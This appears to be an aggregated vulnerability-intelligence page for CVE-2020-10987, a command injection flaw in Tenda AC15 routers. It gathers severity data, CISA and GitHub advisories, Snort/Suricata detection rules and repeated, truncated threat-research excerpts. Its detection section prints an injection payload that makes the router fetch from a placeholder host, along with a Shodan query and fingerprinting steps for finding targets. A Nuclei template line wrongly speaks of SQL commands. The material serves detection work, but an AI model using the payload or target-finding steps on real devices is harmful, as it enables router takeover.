CVE-2020-10987
published 2020-07-13CVE-2020-10987: The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName POST…
PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
79.67%
99.6th percentile
The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName POST parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tenda | ac15_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commanddeviceName=test`;wget http://{{interactsh-url}};`
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Tenda OS Command Injection (CVE-2020-10987) (POST)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"goform/setUsbUnload"; endswith; nocase; fast_pattern; http.request_body; content:"deviceName="; nocase; reference:url,blog.securityevaluators.com/tenda-ac1900-vulnerabilities-discovered-and-exploited-e8e26aa0bc68; reference:cve,2020-10987; classtype:attempted-admin; sid:2034490; rev:2; metadata:attack_target Server, created_at 2021_11_17, cve CVE_2020_10987, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_05_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Tenda OS Command Injection (CVE-2020-10987) (GET)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"goform/setUsbUnload"; nocase; fast_pattern; content:"deviceName="; nocase; distance:0; content:"|3b|"; distance:0; pcre:"/deviceName=[^&$]+\x3b/"; reference:url,cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits; reference:cve,2020-10987; classtype:attempted-admin; sid:2034489; rev:3; metadata:attack_target Server, created_at 2021_11_17, cve CVE_2020_10987, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2023_02_04, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
- →Exploit targets POST requests to /goform/setUsbUnload with shell metacharacters (backtick/semicolon) injected into the deviceName parameter body field.
- →Also observed as GET requests to /goform/setUsbUnload with deviceName parameter containing a semicolon (0x3b) — match pcre /deviceName=[^&$]+\x3b/ on URI.
- →Shodan query for exposed Tenda devices: http.title:"tenda wifi" — use to identify attack surface.
- →Fingerprint the target by checking for 'Tenda WiFi' string in the HTTP response body before attempting exploitation (as used in the Nuclei template pre-check).
- ·The POST-based Snort rule (sid:2034490) is rated confidence Medium, while the GET-based rule (sid:2034489) is rated confidence High — prioritize the GET rule for high-fidelity alerting.
- ·Both Snort rules are scoped to [$HOME_NET,$HTTP_SERVERS] as destination — ensure internal router management interfaces are included in these variable definitions for coverage.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Tenda AC1900 Router AC15 Model Remote Code Execution Vulnerability
cisa·2021-11-03·CVSS 9.8
CVE-2020-10987 [CRITICAL] CWE-78 Tenda AC1900 Router AC15 Model Remote Code Execution Vulnerability
Vulnerability: Tenda AC1900 Router AC15 Model Remote Code Execution Vulnerability
Affected: Tenda AC1900 Router AC15 Model
Tenda AC1900 Router AC15 Model contains an unspecified vulnerability that allows remote attackers to execute system commands via the deviceName POST parameter.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-10987
Remediation Due Date: 2022-05-03
GHSA
GHSA-r3xc-9hm9-gf29: The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15
ghsa_unreviewed·2022-05-24
CVE-2020-10987 [HIGH] CWE-74 GHSA-r3xc-9hm9-gf29: The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15
The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName POST parameter.
VulnCheck
Tenda AC1900 Router AC15 Model Remote Code Execution Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-10987 [CRITICAL] CWE-78 Tenda AC1900 Router AC15 Model Remote Code Execution Vulnerability
Tenda AC1900 Router AC15 Model Remote Code Execution Vulnerability
Tenda AC1900 Router AC15 Model contains an unspecified vulnerability that allows remote attackers to execute system commands via the deviceName POST parameter.
Affected: Tenda AC1900 Router AC15 Model
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.bleepingcomputer.com/news/security/reverse-shell-botnet-gitpaste-12-spreads-via-github-and-pastebin/#google_vignette; https://blogs.juniper.net/en-us/threat-research/everything-but-the-kitchen-sink-more-attacks-from-the-gitpaste-12-worm; https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b; https://cybersecurity.att.com/blogs/labs-research/malware-hosting-domain-cyberium-fanning-out-mirai-variants; https://www.cisa.gov/sites/d
Suricata
ET EXPLOIT Possible Tenda OS Command Injection (CVE-2020-10987) (POST)
suricata·2021-11-17·CVSS 9.8
CVE-2020-10987 [CRITICAL] ET EXPLOIT Possible Tenda OS Command Injection (CVE-2020-10987) (POST)
ET EXPLOIT Possible Tenda OS Command Injection (CVE-2020-10987) (POST)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Tenda OS Command Injection (CVE-2020-10987) (POST)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"goform/setUsbUnload"; endswith; nocase; fast_pattern; http.request_body; content:"deviceName="; nocase; reference:url,blog.securityevaluators.com/tenda-ac1900-vulnerabilities-discovered-and-exploited-e8e26aa0bc68; reference:cve,2020-10987; classtype:attempted-admin; sid:2034490; rev:2; metadata:attack_target Server, created_at 2021_11_17, cve CVE_2020_10987, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_05_03, mitre_tactic_id
Suricata
ET EXPLOIT Tenda OS Command Injection (CVE-2020-10987) (GET)
suricata·2021-11-17·CVSS 9.8
CVE-2020-10987 [CRITICAL] ET EXPLOIT Tenda OS Command Injection (CVE-2020-10987) (GET)
ET EXPLOIT Tenda OS Command Injection (CVE-2020-10987) (GET)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Tenda OS Command Injection (CVE-2020-10987) (GET)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"goform/setUsbUnload"; nocase; fast_pattern; content:"deviceName="; nocase; distance:0; content:"|3b|"; distance:0; pcre:"/deviceName=[^&$]+\x3b/"; reference:url,cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits; reference:cve,2020-10987; classtype:attempted-admin; sid:2034489; rev:3; metadata:attack_target Server, created_at 2021_11_17, cve CVE_2020_10987, deployment Perimeter, deployment Internal, confidence High, sign
Nuclei
Tenda AC15 AC1900 version 15.03.05.19 - Command Injection
nuclei·CVSS 9.8
CVE-2020-10987 [CRITICAL] Tenda AC15 AC1900 version 15.03.05.19 - Command Injection
Tenda AC15 AC1900 version 15.03.05.19 - Command Injection
The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName POST parameter.
Template:
id: CVE-2020-10987
info:
name: Tenda AC15 AC1900 version 15.03.05.19 - Command Injection
author: pussycat0x
severity: critical
description: |
The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName POST parameter.
impact: |
Unauthenticated attackers can execute arbitrary SQL commands to access or modify database contents, potentially compromising the entire Tenda router and network configuration.
remediation: |
Upgrade to a patched firmware version or repl
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus Oct 09, 2025 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Own Toronto 2022 .
Januar
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
The Trend Zero Day Initiative™ (ZDI) and Trend™ Research teams have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus Oct 09, 2025 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Ow
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
# RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus
2025/10/09
Read time: ( words)
Save to Folio
Key takeaways
- The campaign exposes organizations to the risks of data exfiltration, persistent network compromise, and operational disruption for organizations with exposed infrastructure.
- Organizations operating internet-facing network devices are at heightened risk. Active exploitation has been observed globally since mid-2025, with several CVEs now included in CISA’s Known Exploited Vul
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus 2025/10/09 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Own Toronto 2022 .
January
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Ciberamenazas
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
The Trend Zero Day Initiative™ (ZDI) and Trend™ Research teams have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus Oct 09, 2025 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Ow
Unit42
Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496
blogs_unit42·2020-09-03·CVSS 9.8
CVE-2020-17496 [CRITICAL] Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496
## Executive Summary
In September 2019, a remote code execution (RCE) vulnerability identified as CVE-2019-16759 was disclosed for vBulletin, a popular forum software. At that time, Unit 42 researchers published a blog on this vBulletin vulnerability, analyzing its root cause and the exploit we found in the wild. By exploiting this vulnerability, an attacker could have gained privileged access and control over any vBulletin server running versions 5.0.0 up to 5.5.4, and potentially lock organizations out from their own sites.
Recently, Unit 42 researchers found exploits in the wild leveraging the vBulletin pre-auth RCE vulnerability CVE-2020-17496. The exploits are a bypass of the fix for the previous vulnerability, CVE-2019-16759, which allows attackers to send a crafted HTTP request wi
Unit42
Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496
blogs_unit42·2020-09-03·CVSS 9.8
CVE-2020-17496 [CRITICAL] Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496
Threat Research Center
Threat Research
Vulnerabilities
## Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496
Haozhe Zhang
Qi Deng
Zhibin Zhang
Ruchna Nigam
Published: September 3, 2020
Threat Research
Vulnerabilities
CVE-2019-16759
CVE-2020-17496
Exploits
## Executive Summary
In September 2019, a remote code execution (RCE) vulnerability identified as CVE-2019-16759 was disclosed for vBulletin, a popular forum software. At that time, Unit 42 researchers published a blog on this vBulletin vulnerability , analyzing its root cause and the exploit we found in the wild. By exploiting this vulnerability, an attacker could have gained privileged access and control over any vBulletin server running versions 5.0.0 up to 5.5.4, and potentially lock organi
Trendmicro
Mirai Botnet Attack IoT Devices via CVE-2020-5902
blogs_trendmicro·2020-07-28·CVSS 9.8
CVE-2020-5902 [CRITICAL] Mirai Botnet Attack IoT Devices via CVE-2020-5902
# Mirai Botnet Attack IoT Devices via CVE-2020-5902
Based on the workaround published for CVE-2020-5902, we found a Mirai botnet downloader that can be added to new malware variants to scan for exposed Big-IP boxes for intrusion and deliver the malicious payload.
By: Augusto Remillano II, Jemimah Molina
2020/07/28
Read time: ( words)
Save to Folio
Update as of 10:00 A.M. PST, July 30, 2020: Our continued analysis of the malware sample showed adjustments to the details involving the URI and Shodan scan parameters. We made the necessary changes in this post. We would like to thank F5 Networks for reaching out to us to clarify these details.
Following the initial disclosure of two F5 BIG-IP vulnerabilities on the first week of July, we continued monitoring and analyzing the vulnerabilit
https://blog.securityevaluators.com/tenda-ac1900-vulnerabilities-discovered-and-exploited-e8e26aa0bc68https://www.ise.io/research/https://blog.securityevaluators.com/tenda-ac1900-vulnerabilities-discovered-and-exploited-e8e26aa0bc68https://www.ise.io/research/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-10987
2020-07-13
Published
2021-11-03
Added to CISA KEV
Exploited in the wild